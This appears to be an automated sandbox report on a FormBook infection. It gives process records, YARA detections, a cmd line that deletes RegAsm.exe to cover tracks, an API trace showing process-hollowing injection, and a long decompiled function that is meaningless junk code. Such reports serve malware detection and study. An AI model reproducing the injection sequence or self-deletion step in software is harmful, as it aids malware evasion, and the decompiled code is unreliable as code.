                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                Imagebase:0x970000
                                                                                                                                                File size:29696 bytes
                                                                                                                                                MD5 hash:11DDFBF834BB2C6F4D23297D80EE9E45
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                General

                                                                                                                                                Start time:11:23:37
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Imagebase:0xff0000
                                                                                                                                                File size:27136 bytes
                                                                                                                                                MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate

                                                                                                                                                General

                                                                                                                                                Start time:11:23:43
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                                                                                                Imagebase:0x4ab10000
                                                                                                                                                File size:302592 bytes
                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                  Executed Functions

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190144201.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Section$OpenView
                                                                                                                                                  • API String ID: 2380476227-789266925
                                                                                                                                                  • Opcode ID: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                                                                                                                  • Instruction ID: ca2566cc86daa4ebc1bea7311a19f552cd15aca71fddd44853fb50e2e3b84beb
                                                                                                                                                  • Opcode Fuzzy Hash: 787866d0769b518b38cf3cef9c8e0732aeba9ebab195fb7289df72886f22b9db
                                                                                                                                                  • Instruction Fuzzy Hash: C8D2CFB1C1526C8ACF21DFA18D85BDEBBB8BF15740F1041EAD248AB216DB319B84CF55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 002F1CB7
                                                                                                                                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 002F1CDC
                                                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 002F1CF6
                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 002F1D41
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 002F1D66
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 002F1DA9
                                                                                                                                                  • NtTerminateProcess.NTDLL(?,00000000), ref: 002F1DB7
                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 002F1DC2
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 002F1E36
                                                                                                                                                  • NtSetContextThread.NTDLL(?,00010007), ref: 002F1E74
                                                                                                                                                  • NtResumeThread.NTDLL(?,00000000), ref: 002F1E86
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190144201.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Section$ProcessView$CreateMemoryThreadVirtual$ContextInformationQueryReadResumeTerminateUnmapWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2175245719-0
                                                                                                                                                  • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                                                                                                                  • Instruction ID: fb409e544832f2f067109e6d230e9ffb6e78f4c6ff86466e67fb87d1f6fc6bc1
                                                                                                                                                  • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                                                                                                                                  • Instruction Fuzzy Hash: 0091E47190024DEBDF209FA5CC88EEEBBB8FF49745F404065FA09EA150D731AA64DB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtOpenSection.NTDLL(?,0000000C,?), ref: 002F0199
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 002F01B8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190144201.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Section$OpenView
                                                                                                                                                  • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                                                                                                                                  • API String ID: 2380476227-2634024955
                                                                                                                                                  • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                                                                                                                  • Instruction ID: 550a7c49e00088eb1fc8fb14732f44a01b144fbc652baeefe6c1fd42a4bf0014
                                                                                                                                                  • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                                                                                                                                  • Instruction Fuzzy Hash: 9C3116B1D1025CABCB10CFD4C881AEEBBB8FF08750F10416AE614EB251E7749A05CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001D1300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190034457.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: e71c1b11c372e00bb593f7f5bdefeb3b388b183bc4b8d7fb264f9253e8912710
                                                                                                                                                  • Instruction ID: d2b245157bea3e0e6648961802ffa79d697d0dcb7c17a773c08691c1a7066da3
                                                                                                                                                  • Opcode Fuzzy Hash: e71c1b11c372e00bb593f7f5bdefeb3b388b183bc4b8d7fb264f9253e8912710
                                                                                                                                                  • Instruction Fuzzy Hash: D081E030B04244AFCB14DBB4C894AAEBBF6AF89314F24856AD559DB391CB35DC41CB91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001D1300
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190034457.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190008885.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190008885.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2189999088.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2189999088.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E0106AAA2(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                                                                                                                                                  				signed int _t273;
                                                                                                                                                  				signed int _t274;
                                                                                                                                                  				signed int _t276;
                                                                                                                                                  				signed int _t277;
                                                                                                                                                  				signed int _t278;
                                                                                                                                                  				signed int _t279;
                                                                                                                                                  				signed int _t284;
                                                                                                                                                  				signed int _t286;
                                                                                                                                                  				signed int _t288;
                                                                                                                                                  				intOrPtr* _t289;
                                                                                                                                                  				signed int _t291;
                                                                                                                                                  				signed char _t294;
                                                                                                                                                  				signed int _t295;
                                                                                                                                                  				signed int _t296;
                                                                                                                                                  				signed char _t297;
                                                                                                                                                  				signed int* _t301;
                                                                                                                                                  				signed int _t302;
                                                                                                                                                  				signed char _t303;
                                                                                                                                                  				signed int _t304;
                                                                                                                                                  				intOrPtr* _t305;
                                                                                                                                                  				signed int _t306;
                                                                                                                                                  				signed int _t307;
                                                                                                                                                  				signed int _t308;
                                                                                                                                                  				signed int _t310;
                                                                                                                                                  				signed int _t311;
                                                                                                                                                  				signed int _t312;
                                                                                                                                                  				signed char _t318;
                                                                                                                                                  				signed char _t319;
                                                                                                                                                  				signed char _t322;
                                                                                                                                                  				signed char _t323;
                                                                                                                                                  				signed char _t324;
                                                                                                                                                  				signed char _t325;
                                                                                                                                                  				signed char _t326;
                                                                                                                                                  				signed char _t327;
                                                                                                                                                  				signed char _t328;
                                                                                                                                                  				signed char _t329;
                                                                                                                                                  				signed char _t330;
                                                                                                                                                  				signed int* _t331;
                                                                                                                                                  				signed char _t332;
                                                                                                                                                  				signed int* _t333;
                                                                                                                                                  				signed char _t334;
                                                                                                                                                  				signed char _t335;
                                                                                                                                                  				signed char _t336;
                                                                                                                                                  				signed char _t337;
                                                                                                                                                  				signed char _t338;
                                                                                                                                                  				signed char _t340;
                                                                                                                                                  				signed char _t341;
                                                                                                                                                  				signed char _t342;
                                                                                                                                                  				signed int _t343;
                                                                                                                                                  				signed int _t344;
                                                                                                                                                  				signed int* _t345;
                                                                                                                                                  				signed int _t347;
                                                                                                                                                  				intOrPtr* _t349;
                                                                                                                                                  				intOrPtr* _t351;
                                                                                                                                                  				char* _t352;
                                                                                                                                                  				intOrPtr* _t353;
                                                                                                                                                  				signed int _t354;
                                                                                                                                                  				void* _t356;
                                                                                                                                                  				signed char _t361;
                                                                                                                                                  				signed int _t362;
                                                                                                                                                  				signed char _t364;
                                                                                                                                                  				intOrPtr* _t365;
                                                                                                                                                  				void* _t366;
                                                                                                                                                  				signed int _t367;
                                                                                                                                                  				void* _t368;
                                                                                                                                                  				void* _t372;
                                                                                                                                                  				intOrPtr* _t373;
                                                                                                                                                  				signed int _t377;
                                                                                                                                                  				void* _t378;
                                                                                                                                                  				void* _t380;
                                                                                                                                                  				signed int* _t381;
                                                                                                                                                  				signed int _t383;
                                                                                                                                                  				void* _t384;
                                                                                                                                                  				intOrPtr* _t385;
                                                                                                                                                  				signed int _t389;
                                                                                                                                                  				signed int _t391;
                                                                                                                                                  				intOrPtr* _t392;
                                                                                                                                                  				signed char _t394;
                                                                                                                                                  				signed char _t396;
                                                                                                                                                  				signed int _t397;
                                                                                                                                                  				signed int* _t398;
                                                                                                                                                  				signed int* _t401;
                                                                                                                                                  				signed char _t407;
                                                                                                                                                  				signed char _t410;
                                                                                                                                                  				signed int* _t412;
                                                                                                                                                  				void* _t413;
                                                                                                                                                  				signed int _t415;
                                                                                                                                                  				signed int _t416;
                                                                                                                                                  
                                                                                                                                                  				_t273 = __eax | 0xf6000102;
                                                                                                                                                  				 *(__edi + 0x9000100) =  *(__edi + 0x9000100) ^ __ecx;
                                                                                                                                                  				_t416 = _t415 ^ __edi;
                                                                                                                                                  				asm("sbb al, [ecx]");
                                                                                                                                                  				 *__ebx =  *__ebx + __edx;
                                                                                                                                                  				 *__ecx =  *__ecx ^ _t273;
                                                                                                                                                  				asm("sbb eax, [ecx]");
                                                                                                                                                  				 *__edi =  *__edi + __ebx;
                                                                                                                                                  				 *0x2f000102 =  *0x2f000102 ^ __ecx;
                                                                                                                                                  				 *0x66000102 =  *0x66000102 ^ __ecx;
                                                                                                                                                  				_t274 = _t273 | 0x17000102;
                                                                                                                                                  				ss = ss;
                                                                                                                                                  				_push(ss);
                                                                                                                                                  				_t377 = __edx &  *(__edi + 0x4500060d);
                                                                                                                                                  				 *(__edi + 0x4e00010d) =  *(__edi + 0x4e00010d) ^ _t377;
                                                                                                                                                  				 *(__edi + 0x59000109) =  *(__edi + 0x59000109) ^ __esi;
                                                                                                                                                  				_t276 = (_t274 | 0x5b000102) ^ __edi;
                                                                                                                                                  				 *__ecx =  *__ecx + _t276;
                                                                                                                                                  				_t277 = _t276 + __ebx;
                                                                                                                                                  				asm("clc");
                                                                                                                                                  				 *__ecx =  *__ecx + _t277;
                                                                                                                                                  				 *((intOrPtr*)(_t377 + 0x31)) =  *((intOrPtr*)(_t377 + 0x31)) + __ecx;
                                                                                                                                                  				_t278 = _t277 | 0x71000102;
                                                                                                                                                  				_t347 = __ebx ^ __edi;
                                                                                                                                                  				asm("adc [ecx], al");
                                                                                                                                                  				 *((intOrPtr*)(_t278 + 0x100af31)) =  *((intOrPtr*)(_t278 + 0x100af31)) + _t278;
                                                                                                                                                  				 *((intOrPtr*)(_t377 + 0x60d9731)) =  *((intOrPtr*)(_t377 + 0x60d9731)) + __ecx;
                                                                                                                                                  				_t412[0x5802bcc] = _t412[0x5802bcc] + _t278;
                                                                                                                                                  				_t279 = _t278 + __ecx;
                                                                                                                                                  				ss = ss;
                                                                                                                                                  				asm("sgdt [es:eax]");
                                                                                                                                                  				asm("o16 xor al, 0xaf");
                                                                                                                                                  				 *__ecx =  *__ecx + _t279;
                                                                                                                                                  				_t412[0xd] = _t412[0xd] + _t347;
                                                                                                                                                  				 *__ecx =  *__ecx + ((_t279 | 0x98000102) ^ 0x000000af);
                                                                                                                                                  				 *((intOrPtr*)(_t347 + 0x10d9734)) =  *((intOrPtr*)(_t347 + 0x10d9734)) + _t377;
                                                                                                                                                  				 *((intOrPtr*)(__ecx + 0x35)) =  *((intOrPtr*)(__ecx + 0x35)) + _t377;
                                                                                                                                                  				 *0xd =  *0xd + 0xd;
                                                                                                                                                  				_t284 = __edi | 0x35670001;
                                                                                                                                                  				asm("scasd");
                                                                                                                                                  				 *__esi =  *__esi + 0xd;
                                                                                                                                                  				_push(es);
                                                                                                                                                  				asm("lahf");
                                                                                                                                                  				asm("sbb al, 0x56");
                                                                                                                                                  				asm("lahf");
                                                                                                                                                  				asm("sbb al, 0x56");
                                                                                                                                                  				asm("adc cl, 0x35");
                                                                                                                                                  				asm("lahf");
                                                                                                                                                  				asm("sbb al, 0x1");
                                                                                                                                                  				 *((intOrPtr*)(__esi + 0x34)) =  *((intOrPtr*)(__esi + 0x34)) + _t284;
                                                                                                                                                  				asm("scasd");
                                                                                                                                                  				 *0x56020d35 =  *0x56020d35 + 0xd;
                                                                                                                                                  				_t286 = _t284 + _t284 ^ 0x013300af;
                                                                                                                                                  				asm("sahf");
                                                                                                                                                  				asm("out 0x1c, eax");
                                                                                                                                                  				asm("enter 0x20, 0x0");
                                                                                                                                                  				 *_t286 =  *_t286 + 0xd;
                                                                                                                                                  				_t391 = _t286;
                                                                                                                                                  				 *0x0000002E =  *((intOrPtr*)(0x2e)) + 0x34;
                                                                                                                                                  				_push(0x56020d35);
                                                                                                                                                  				 *0x56020d35 =  *0x56020d35 + 0xd;
                                                                                                                                                  				_t378 = _t377 + _t377;
                                                                                                                                                  				 *__esi =  *__esi & 0x0000000d;
                                                                                                                                                  				 *__esi =  *__esi + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t391 + 0x60219d00)) =  *((intOrPtr*)(_t391 + 0x60219d00)) + _t378;
                                                                                                                                                  				 *0x34 =  *0x34 + 0xd;
                                                                                                                                                  				_t349 = 0x34 + __esi;
                                                                                                                                                  				 *__esi =  *__esi & 0x0000000d;
                                                                                                                                                  				 *__esi =  *__esi + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t391 + 0x6821ae00)) =  *((intOrPtr*)(_t391 + 0x6821ae00)) + _t378;
                                                                                                                                                  				 *0x20f400 =  *0x20f400 + 0xd;
                                                                                                                                                  				 *__esi =  *__esi + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t391 + 0x6e21df00)) =  *((intOrPtr*)(_t391 + 0x6e21df00)) + _t378;
                                                                                                                                                  				 *_t391 =  *_t391 + 0xd;
                                                                                                                                                  				_t288 = __esi + _t349;
                                                                                                                                                  				 *_t288 =  *_t288 & 0x0000000d;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t349 + 0x7621f200)) =  *((intOrPtr*)(_t349 + 0x7621f200)) + _t378;
                                                                                                                                                  				 *_t391 =  *_t391 + 0xd;
                                                                                                                                                  				 *0x56020d35 =  *0x56020d35 + 0x56020d7f;
                                                                                                                                                  				 *_t288 =  *_t288 & _t288;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t349 + 0x7b220e00)) =  *((intOrPtr*)(_t349 + 0x7b220e00)) + _t378;
                                                                                                                                                  				 *0xd =  *0xd + 0xd;
                                                                                                                                                  				 *_t349 =  *_t349 + 0x34;
                                                                                                                                                  				 *_t288 =  *_t288 & _t288;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t349 + 0x7b221a00)) =  *((intOrPtr*)(_t349 + 0x7b221a00)) + _t378;
                                                                                                                                                  				 *0xd =  *0xd + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t288 + 0x27)) =  *((intOrPtr*)(_t288 + 0x27)) + _t349;
                                                                                                                                                  				 *((intOrPtr*)(_t391 - 0x68ddd600)) =  *((intOrPtr*)(_t391 - 0x68ddd600)) + _t378;
                                                                                                                                                  				 *0xd =  *0xd + 0xd;
                                                                                                                                                  				 *_t391 =  *_t391 + 0x34;
                                                                                                                                                  				 *_t288 =  *_t288 & _t288;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t391 - 0x6cf1dae8)) =  *((intOrPtr*)(_t391 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *_t288 =  *_t288 + 0x56020d7f;
                                                                                                                                                  				 *_t391 =  *_t391 + _t288;
                                                                                                                                                  				 *_t288 =  *_t288 & _t288;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				 *0xC424464D =  *((intOrPtr*)(0xc424464d)) + _t378;
                                                                                                                                                  				 *_t288 =  *_t288 + 0x56020d7f;
                                                                                                                                                  				_t412[8] = _t412[8] + _t378;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				 *_t288 =  *_t288 + 0xd;
                                                                                                                                                  				_t289 = _t349;
                                                                                                                                                  				 *0x0000002F =  *((intOrPtr*)(0x2f)) + _t378;
                                                                                                                                                  				asm("daa");
                                                                                                                                                  				 *_t289 =  *_t289 + 0xd;
                                                                                                                                                  				 *_t289 =  *_t289 + 0xd;
                                                                                                                                                  				_t392 = _t289;
                                                                                                                                                  				_t412[8] = _t412[8] + 0x56020d7f;
                                                                                                                                                  				asm("in al, 0x0");
                                                                                                                                                  				_t291 = _t391 |  *_t391;
                                                                                                                                                  				 *((intOrPtr*)(_t392 - 0xadd8800)) =  *((intOrPtr*)(_t392 - 0xadd8800)) + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
                                                                                                                                                  				 *_t291 =  *_t291 & _t291;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				 *0xC4249835 =  *((intOrPtr*)(0xc4249835)) + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
                                                                                                                                                  				 *_t291 =  *_t291 & _t291;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t392 + 0x6e229b00)) =  *((intOrPtr*)(_t392 + 0x6e229b00)) + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
                                                                                                                                                  				_t389 = 0x28;
                                                                                                                                                  				 *_t291 =  *_t291 & _t291;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				 *0xC424D935 =  *((intOrPtr*)(0xc424d935)) + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
                                                                                                                                                  				_push(ds);
                                                                                                                                                  				 *_t291 =  *_t291 & _t291;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t392 - 0x6cf1dae8)) =  *((intOrPtr*)(_t392 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
                                                                                                                                                  				asm("insd");
                                                                                                                                                  				 *_t291 =  *_t291 & _t291;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(0xc424464d)) =  *((intOrPtr*)(0xc424464d)) + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t291 + _t291)) =  *((intOrPtr*)(_t291 + _t291)) + 0x56020d7f;
                                                                                                                                                  				 *_t291 = gs;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				 *_t291 =  *_t291 + 0xd;
                                                                                                                                                  				_t294 = _t392 + 0x00000034 &  *_t389;
                                                                                                                                                  				 *((intOrPtr*)(_t294 + _t294)) =  *((intOrPtr*)(_t294 + _t294)) + 0x56020d35;
                                                                                                                                                  				asm("les ebp, [eax]");
                                                                                                                                                  				 *_t294 =  *_t294 + 0xd;
                                                                                                                                                  				 *_t294 =  *_t294 + 0xd;
                                                                                                                                                  				_t295 = _t291;
                                                                                                                                                  				_t394 = _t294;
                                                                                                                                                  				_t351 = _t288 + 0xfc000800;
                                                                                                                                                  				_t361 = 0x56020d7f &  *0x56020d35;
                                                                                                                                                  				 *0x294c00 =  *0x294c00 + 0x56020d35;
                                                                                                                                                  				 *_t295 =  *_t295 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t394 + 0x67232c00)) =  *((intOrPtr*)(_t394 + 0x67232c00)) + 0xfc000800;
                                                                                                                                                  				 *_t394 =  *_t394 + 0x56020d35;
                                                                                                                                                  				 *((intOrPtr*)(_t295 + 0x29)) =  *((intOrPtr*)(_t295 + 0x29)) + _t295;
                                                                                                                                                  				 *((intOrPtr*)(_t394 - 0x6adc8700)) =  *((intOrPtr*)(_t394 - 0x6adc8700)) + 0xfc000800;
                                                                                                                                                  				 *0x56020d35 =  *0x56020d35 + 0xfc000800;
                                                                                                                                                  				 *_t295 =  *_t295 + _t295;
                                                                                                                                                  				_t296 = _t295 -  *_t295;
                                                                                                                                                  				 *_t296 =  *_t296 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t394 + 0x29239c00)) =  *((intOrPtr*)(_t394 + 0x29239c00)) + 0xfc000800;
                                                                                                                                                  				 *0xfc000800 =  *0xfc000800 + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(0xfc000800 + _t412)) =  *((intOrPtr*)(0xfc000800 + _t412)) + _t361;
                                                                                                                                                  				 *_t296 =  *_t296 + 0xd;
                                                                                                                                                  				 *0x0D25D635 =  *((intOrPtr*)(0xd25d635)) + 0xfc000800;
                                                                                                                                                  				 *_t351 =  *_t351 + 0xfc000800;
                                                                                                                                                  				 *_t394 =  *_t394 + 0x34;
                                                                                                                                                  				 *_t296 =  *_t296 & _t296;
                                                                                                                                                  				 *_t296 =  *_t296 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t394 - 0x6cf1dae8)) =  *((intOrPtr*)(_t394 - 0x6cf1dae8)) + 0xd;
                                                                                                                                                  				 *_t394 =  *_t394 + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(0xfc000800 + _t412)) =  *((intOrPtr*)(0xfc000800 + _t412)) + _t296;
                                                                                                                                                  				_t297 = _t394;
                                                                                                                                                  				_t412[0x580ac09] = _t412[0x580ac09] + 0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t297 + 0x2b)) =  *((intOrPtr*)(_t297 + 0x2b)) + _t351;
                                                                                                                                                  				 *_t297 =  *_t297 + 0xd;
                                                                                                                                                  				 *_t297 =  *_t297 + 0xd;
                                                                                                                                                  				_t396 = _t297;
                                                                                                                                                  				 *((intOrPtr*)(_t351 + 0x10)) =  *((intOrPtr*)(_t351 + 0x10)) + _t361;
                                                                                                                                                  				 *0xfc000800 =  *0xfc000800 + 1;
                                                                                                                                                  				asm("sbb [eax], al");
                                                                                                                                                  				L2();
                                                                                                                                                  				 *((intOrPtr*)(_t396 + 0x52106b00)) =  *((intOrPtr*)(_t396 + 0x52106b00)) + 0xfc000800;
                                                                                                                                                  				_t352 = _t351 +  *0xfc000800;
                                                                                                                                                  				 *((intOrPtr*)(_t412 + _t416)) =  *((intOrPtr*)(_t412 + _t416)) + _t361;
                                                                                                                                                  				_t397 = _t296;
                                                                                                                                                  				 *((intOrPtr*)(_t352 + 0x10)) =  *((intOrPtr*)(_t352 + 0x10)) + _t361;
                                                                                                                                                  				 *_t352 =  *_t352 + 0x1c;
                                                                                                                                                  				_t301 = _t396 + _t396;
                                                                                                                                                  				 *_t301 =  *_t301 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t397 - 0x35db5300)) =  *((intOrPtr*)(_t397 - 0x35db5300)) + 0xfc000800;
                                                                                                                                                  				_t353 = _t352 +  *0x2d7800;
                                                                                                                                                  				 *_t301 =  *_t301 + 0xd;
                                                                                                                                                  				 *((intOrPtr*)(_t397 + 0x40f8300)) =  *((intOrPtr*)(_t397 + 0x40f8300)) + 0xfc000800;
                                                                                                                                                  				_t302 = _t397;
                                                                                                                                                  				_t398 = _t301;
